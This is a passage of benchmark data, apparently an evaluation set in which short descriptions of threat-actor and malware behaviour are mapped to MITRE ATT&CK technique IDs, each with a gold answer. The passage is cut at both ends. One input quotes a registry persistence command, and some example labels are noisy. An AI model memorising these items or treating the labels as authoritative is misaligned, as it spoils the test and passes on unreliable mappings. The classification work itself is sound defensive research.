\"sleep\" for a specified time to evade detection.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n", + "input": "T9000 gathers and beacons the system time during installation.", + "gold": "- T1124: System Time Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: At the beginning of 2017, Silent Librarian began to regularly obtain free Let\u2019s Encrypt SSL certificates for their phishing pages. This technique, which we have previous discussed at length in blog posts from November and December, is used to create more realistic-looking phishing pages\n\t - T1588.004: Obtain Capabilities - Digital Certificates\n- Text: PROMETHIUM has created self-signed digital certificates for use in HTTPS C2 traffic.\n\t - T1587.003: Develop Capabilities - Digital Certificates\n- Text: Sykipot uses SSL for encrypting C2 communications.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n", + "input": "Lazarus Group has obtained SSL certificates for their C2 domains.", + "gold": "- T1588.004: Obtain Capabilities - Digital Certificates", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Zlh.exe is a legitimate, signed Norman Safeground AS application, which is used to sideload a malicious nflogger.dll DLL.The encrypted ZeroT payload is usually named NO.2.mui. The sideloaded DLL does not always use the same vulnerable executable, but it is always similar in functionality. Usually the DLL is not packed, but we have observed instances compressed by UPX. This malicious DLL is usually obfuscated with the same junk code: dummy API calls inserted in between real instructions (Fig. 7). The same obfuscation can be found in multiple functions in ZeroT itself\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n- Text: No matching sample found for T1553.003\n- Text: Naikon uses commands such as \"netsh advfirewall firewall\" to discover local firewall settings.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", + "input": "APT32 includes garbage code to mislead anti-malware software and researchers.", + "gold": "- T1027.001: Obfuscated Files or Information - Binary Padding", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: All observed attacks start with an email message, containing either a malicious attachment or a URL which leads to the first stage of the attack. The text of the emails is likely taken from legitimate email, such as mailing lists that targeted organisations may be subscribed to. Below are three examples, with the first one purporting to be sent by the European Banking Federation and is using a newly registered domain for the spoofed sender email address. The attachment is a malicious PDF file that entices the user to click on a URL to download and open a weaponized RTF file containing exploits for CVE-2017-11882, CVE-2017-8570 and CVE-2018-8174. This campaign contains a URL, which points to a malicious Word document where the infection chain is triggered by the user allowing the VBA macro code to run. Observed email campaign 2 The third campaign, sent on July 10, is a more personal campaign that targets a variety of businesses. The subject indicates that this is a complaint about problems with services provided by the target company, allegedly listed in an attached document. The attachment is an RTF document containing exploits that start the chain of several infection stages until the final executable payload is downloaded and loaded in the memory of the infected system. All emails lead to stage 1 of the attack chain. Observed email campaign 3\n\t - T1204.002: User Execution - Malicious File\n- Text: Tropic Trooper sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Panda Stealer is deployed through spam emails posing as business quote requests to lure unwary victims into opening malicious Excel files. We have identified two infection chains: in one, an .XLSM attachment contains macros that download a loader (Figure 1). Then, the loader downloads and executes the main stealer. \n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1137.001: Office Application Startup - Office Template Macros\n", + "input": "Squirrelwaffle has relied on users enabling malicious macros within Microsoft Excel and Word attachments.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Zirconium is using what are referred to as web bugs, or web beacons, tied to a domain they purchased and populated with content. Although the domain itself may not have malicious content, the web bug allows Zirconium to check if a user attempted to access the site\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: Hardcore Nationalist group SideWinder is a threat group active since 2012 according to Kaspersky. This group mainly targets Pakistanis and Chinese military & government entities\u2019 windows machines. They also target mobile phone devices. This is the second time this group is using COVID-19 theme to lure victims, thereby capitalizing on the fear of global pandemic. Sidewinder aka HN2 is believed to be an Indian state sponsored group. A detailed analysis of SideWinder attacks on Pakistani military officials was also published in April\n\t - T1204.002: User Execution - Malicious File\n\t - T1204.001: User Execution - Malicious Link\n- Text: sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that execute PowerShells scripts to download Pupy.\n\t - T1598.003: Phishing for Information - Spearphishing Link\n", + "input": "Transparent Tribe has embedded links to malicious downloads in e-mails.", + "gold": "- T1566.002: Phishing - Spearphishing Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZxShell has a command to open a file manager and explorer on the system.\n\t - T1083: File and Directory Discovery\n- Text: can obtain information on installed anti-malware programs.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Another component of the KGH suite is the m.dll module, which is an information stealer that harvest data from browsers, Windows Credential Manager, WINSCP and mail clients\n\t - T1114.001: Email Collection - Local Email Collection\n", + "input": "Zeus Panda searches for specific directories on the victim\u2019s machine.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MoonWind obtains the number of removable drives from the victim.\n\t - T1120: Peripheral Device Discovery\n- Text: The FunnyDream FilePakMonitor component has the ability to collect files from removable devices.\n\t - T1025: Data from Removable Media\n- Text: USBStealer exfiltrates collected files via removable media from air-gapped victims.\n\t - T1052.001: Exfiltration Over Physical Medium - Exfiltration over USB\n", + "input": "Gamaredon Group tools have contained an application to check performance of USB flash drives. Gamaredon Group has also used malware to scan for removable drives.", + "gold": "- T1120: Peripheral Device Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration.\n\t - T1560: Archive Collected Data\n- Text: Emotet has been seen exfiltrating system information stored within cookies sent within an HTTP GET request back to its C2 servers.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n\t - T1074.001: Data Staged - Local Data Staging\n", + "input": "Remexi encrypts and adds all gathered browser data into files for upload to C2.", + "gold": "- T1560: Archive Collected Data", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In July 2018, Unit 42 analyzed a targeted attack using a novel file type against at least one government agency in the Middle East. It was carried out by a previously unpublished threat group we track as DarkHydrus. Based on our telemetry, we were able to uncover additional artifacts leading us to believe this adversary group has been in operation with their current playbook since early 2016. Once opened, Excel will retrieve whatever object is at the URL inside the file. These files have most recently been found in use by criminals to deliver commodity RATs such as Flawed Ammyy. In DarkHydrus's case, the preferred payload retrieved in their previous attacks were exclusively open-source legitimate tools which they abuse for malicious purposes, such as Meterpreter and Cobalt Strike. However, in this instance, it appears that this group used a custom PowerShell based payload that we call RogueRobin\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: APT30 has relied on users to execute malicious file attachments delivered via spearphishing emails.\n\t - T1204.002: User Execution - Malicious File\n- Text: Lazarus Group has used fake job advertisements sent via LinkedIn to spearphish victims.\n\t - T1566.003: Phishing - Spearphishing via Service\n", + "input": "Magic Hound has used personalized spearphishing attachments.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Encrypted Configuration in shellcode The configuration information for the malware, including the C2 information are encrypted in the first shellcode blob and are passed as an argument to the DllMain function of the main PlugX DLL\n\t - T1082: System Information Discovery\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1027: Obfuscated Files or Information\n- Text: collects the username from the victim\u2019s machine.\n\t - T1033: System Owner/User Discovery\n- Text: To avoid being run in sandboxes and emulators, all MegaCortex versions implement file encryption threading based on querying for the number of CPUs in the system. All MegaCortex versions can detect if the binary is running with administrator privileges\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "BLINDINGCAN has collected from a victim machine the system name, processor information, OS version, and disk information, including type and free space available.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As we can see, it simply downloads a file from secure.dropinbox[.]pw using HTTP on port 443 (not HTTPS), and proceeds to decrypt the file using AES-128 prior to executing it. At this point, Cardinal RAT has been downloaded and executed, and execution is directed to this sample. Of course, the Carp Downloader is not required to download Cardinal RAT, however, based on our visibility, it has exclusively done so\n\t - T1105: Ingress Tool Transfer\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: OnionDuke steals credentials from its victims.\n\t - T1003: OS Credential Dumping\n- Text: Keydnap uses Python for scripting to execute additional commands.\n\t - T1059.006: Command and Scripting Interpreter - Python\n", + "input": "Denis deploys additional backdoors and hacking tools to the system.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: We have discovered that malware dubbed WinDealer, spread by Chinese-speaking APT actor LuoYu, has an ability to perform intrusions through a man-on-the-side attack\n\t - T1204.001: User Execution - Malicious Link\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1120: Peripheral Device Discovery\n- Text: Figure 7: Dropbox-themed landing page with a lure asking users to click a button that links to the malicious document\n\t - T1204.001: User Execution - Malicious Link\n- Text: The attackers gain an initial foothold on targeted machines via phishing emails containing malicious attachments. The emails are often industry-specific and crafted to entice a victim to open the message and execute the attached document\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "OilRig has sent spearphising emails with malicious links to potential victims.", + "gold": "- T1566.002: Phishing - Spearphishing Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In this blog, we described how Redaman has become more effective by hiding dynamic C&C server addresses inside the Bitcoin blockchain\n\t - T1102.001: Web Service - Dead Drop Resolver\n- Text: The FTP account information used in the malware can expose the C&C server to attacks. The string \u2018victory\u2019 used in the password has also been found in the b374k webshell used by the Kimsuky group\n\t - T1598.003: Phishing for Information - Spearphishing Link\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n\t - T1027: Obfuscated Files or Information\n- Text: Cobalt Strike can use Python to perform execution.\n\t - T1059.006: Command and Scripting Interpreter - Python\n", + "input": "BRONZE BUTLER's MSGET downloader uses a dead drop resolver to access malicious payloads.", + "gold": "- T1102.001: Web Service - Dead Drop Resolver", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: UPPERCUT has the capability to gather the victim's proxy information.\n\t - T1016: System Network Configuration Discovery\n- Text: Andariel has inserted a malicious script within compromised websites to collect potential victim information such as browser type, system language, Flash Player version, and other data.\n\t - T1592.002: Gather Victim Host Information - Software\n- Text: We also identified a Tomiris variant (internally named \u201cSBZ\u201d, MD5 51AA89452A9E57F646AB64BE6217788E) which acts as a filestealer, and uploads any recent file matching a hardcoded set of extensions (.doc, .docx, .pdf, .rar, etc\n\t - T1005: Data from Local System\n", + "input": "Sandworm Team has collected the username from a compromised host.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kimsuky has obtained and used tools such as Nirsoft WebBrowserPassVIew, Mimikatz, and PsExec.\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: Ke3chang has used Mimikatz to generate Kerberos golden tickets.\n\t - T1558.001: Steal or Forge Kerberos Tickets - Golden Ticket\n- Text: CozyCar has executed Mimikatz to harvest stored credentials from the victim and further victim penetration.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", + "input": "Ke3chang has obtained and used tools such as Mimikatz.", + "gold": "- T1588.002: Obtain Capabilities - Tool", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Axiom group has used other forms of obfuscation, include commingling legitimate traffic with communications traffic so that network streams appear legitimate.\n\t - T1001: Data Obfuscation\n- Text: DnsSystem can Base64 encode data sent to C2.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: After we decrypted the additional shellcode, we determined that the functional shellcode is part of the Metasploit Framework, specifically using the block_api.asm code to resolve API function names and the block_reverse_http.asm code to obtain additional shellcode to execute on the system\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1105: Ingress Tool Transfer\n", + "input": "IcedID has utilzed encrypted binaries and base64 encoded strings.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Configuration Decryption: Another small, but same important function in the photo above, is the function for decrypting the data containing the C&C configuration\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: ROKRAT relies on a specific victim hostname to execute and decrypt important strings.\n\t - T1480.001: Execution Guardrails - Environmental Keying\n- Text: And finally, a mention of Trojan-Downloader.Win32.CWS.j, another common site on malicious websites. This downloader is basically a small stub which downloads and installs variants of CWS, perhaps better known as CoolWebSearch. CoolWebSearch is a malicious program which was first reported circa 2003. Ever since, a huge number of variants have been found in the wild, most of them following the same pattern of hijacking the browser startup page and displaying pornographic pop-ups. Over time, CWS variants have become more and more complex and the latest versions include rootkit stealth components and retro features designed to terminate antivirus programs.\n\t - T1176: Browser Extensions\n\t - T1014: Rootkit\n\t - T1588.001: Obtain Capabilities - Malware\n", + "input": "The Winnti for Windows dropper can decrypt and decompresses a data blob.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ursnif droppers have used COM properties to execute malware in hidden windows.\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: InvisiMole has used ListPlanting to inject code into a trusted process.\n\t - T1055.015: Process Injection - ListPlanting\n- Text: Imminent Monitor has a dynamic debugging feature to set the file attribute to hidden.\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n", + "input": "Higaisa used a payload that creates a hidden window.", + "gold": "- T1564.003: Hide Artifacts - Hidden Window", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In our case study, approximately two minutes after Cobalt Strike activity started, a tool to enumerate an AD environment appeared on the infected host at C:\\ProgramData\\AdFind.exe.\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1595: Active Scanning\n- Text: TEMP.Veles has used Mimikatz and a custom tool, SecHack, to harvest credentials.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: As shown in Figure 11, after compromising an initial victim's system (patient 0), the threat actors use the Baidu search engine to search for the victim's organization name. They then identify the Exchange server and attempt to install the OwaAuth web shell. If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail, the adversaries identify other externally accessible servers and deploy ChinaChopper web shells. Within six hours of entering the environment, the threat actors compromised multiple systems and stole credentials for the entire domain\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", + "input": "APT41 has obtained and used tools such as Mimikatz, pwdump, PowerSploit, and Windows Credential Editor.", + "gold": "- T1588.002: Obtain Capabilities - Tool", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The dropped payload is a DLL file that has been packed using the UPX packer. The unpacked sample is highly obfuscated and important API calls and strings have been encrypted using a custom encryption algorithm. Whenever in the code the malware needs to use a string, it takes the encrypted string and passes it into two functions to decrypt it\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: BRONZE BUTLER has used steganography in multiple operations to conceal malicious payloads.\n\t - T1027.003: Obfuscated Files or Information - Steganography\n- Text: TeamTNT has used a script that decodes a Base64-encoded version of WeaveWorks Scope.\n\t - T1140: Deobfuscate/Decode Files or Information\n", + "input": "IcedID has packed and encrypted its loader module.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ramsay can insert itself into the address space of other applications using the AppInit DLL Registry key.\n\t - T1546.010: Event Triggered Execution - AppInit DLLs\n- Text: This update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the Emissary service, which the Trojan will store in and access from the following registry keys:\n\t - T1574.011: Hijack Execution Flow - Services Registry Permissions Weakness\n- Text: We saw a Waterbear loader named \"ociw32.dll\" inside one of the folders in the %PATH% environmental variable. This DLL name is hardcoded inside \"mtxoci.dll\" which is loaded by the MSDTC service during boot-up. mtxoci.dll\u201d first tries to query the registry key \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\" to see if the value \"OracleOciLib\" exists. If so, it retrieves the data inside it and loads the corresponding library. If the value doesn't exist, \u201cmtxoci.dll\u201d tries to load \"ociw32.dll\" instead. During our investigation, we noticed that the value \"OracleOciLib\" was deleted from the victim's machine, as shown in Figure 2. Hence, the malicious loader \"ociw32.dll\" was loaded and successfully executed on the host\n\t - T1112: Modify Registry\n", + "input": "During Operation Honeybee, the threat actors used batch files that allowed them to establish persistence by adding the following Registry key: `\"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost\" /v COMSysApp /t REG_MULTI_SZ /d \"COMSysApp\" /f`.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: From these reports, we know that the group uses an abundance of tools and tactics, ranging across zero-day exploits targeting common applications such as Java or Microsoft Office, heavy use of spear-phishing attacks, compromising legitimate websites to stage watering-hole attacks, and targeting over a variety of operating systems \u2013 Windows, OSX, Linux, even mobile iOS\n\t - T1189: Drive-by Compromise\n- Text: The websites contain numerous articles and content to make them seem legitimate; in some cases the websites have over 10,000 individual news articles. Volexity has found the content is largely scraped and reposted in full from various other legitimate online news outlets. This appears to be done in an automated fashion and most likely through WordPress plugins. Numerous posted articles and images can be directly tracked back to other online blogs and newspapers; sometimes the byline or even watermark in images show directly where the article was sourced. In some cases, only a small number of pages on the site contains malicious code; in other cases, the profiling code is pervasive\n\t - T1608.004: Stage Capabilities - Drive-by Target\n- Text: Hancitor has been delivered via phishing emails which contained malicious links.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "APT28 has compromised targets via strategic web compromise utilizing custom exploit kits.", + "gold": "- T1189: Drive-by Compromise", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The malware calls User32.dll's GetKeyboardLayoutList function, inspects the keyboard identifier, and returns true if the result ends in a value between \\x18 thru \\x44 inclusive. This result means the compromised host is whitelisted based on the host's configured keyboard layout. The malware inspects only the lower byte of the full keyboard identifier, so all systems using the keyboard locales listed in Table 4 are immune to REvil. Despite the large number of potential matches, CTU researchers suspect that the malware author intended to identify Russian keyboards based on several other links to the Russia-based GandCrab ransomware\n\t - T1082: System Information Discovery\n- Text: Bazar can identify the username of the infected user.\n\t - T1033: System Owner/User Discovery\n- Text: For instance, here are the resulting decrypted strings from each of the case statements (dd7e69e1\u2026): Case \u2013 String decrypted 1 \u2013 185.25.50[.]93 2 \u2013 POST http://185.25.50[.]93/syshelp/kd8812u/protocol.php HTTP/1.1\\r\\nHost: 185.25.50[.]93\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: 3 \u2013 porg= 4 \u2013 Content-Length: The Trojan uses raw sockets to communicate with its C2 server and uses the decrypted string above to create HTTP requests\n\t - T1071: Application Layer Protocol\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1008: Fallback Channels\n", + "input": "SslMM sends information to its hard-coded C2, including OS version, service pack information, processor speed, system name, and OS install date.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Collect information about each disk, including directory and file lists, disk names, total space, and remaining space\n\t - T1082: System Information Discovery\n- Text: MCMD has the ability to upload files from an infected device.\n\t - T1005: Data from Local System\n- Text: Valak can gather information regarding the user.\n\t - T1033: System Owner/User Discovery\n", + "input": "MoleNet can collect information about the about the system.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: POWERSTATS has the ability to identify the username on the compromised host.\n\t - T1033: System Owner/User Discovery\n- Text: Most modifications of Trojan.Win32.Waldek are distributed via removable media and include functionality to 